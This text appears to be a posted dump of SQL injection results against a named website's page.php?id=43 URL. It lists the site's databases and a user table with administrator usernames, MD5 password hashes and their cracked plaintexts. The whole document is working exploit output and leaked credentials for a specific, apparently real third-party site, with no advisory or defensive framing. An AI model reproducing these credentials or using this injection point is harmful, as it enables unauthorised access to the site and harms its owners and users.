VULN URL : http://ruzgaraltiinsaat.com/page.php?id=43

available databases [2]:                                                                                                                                                                                             
[*] information_schema
[*] ruzgar6cms33

Database: ruzgar6cms33                                                                                                                                                                                               
Table: 35cgnuser
[2 entries]
+----+----------+------------------------------------------+
| id | username | userpass                                 |
+----+----------+------------------------------------------+
| 2  | admin    | 21232f297a57a5a743894a0e4a801fc3 (admin) |
| 5  | cgn      | 202cb962ac59075b964b07152d234b70 (123)   |
+----+----------+------------------------------------------+
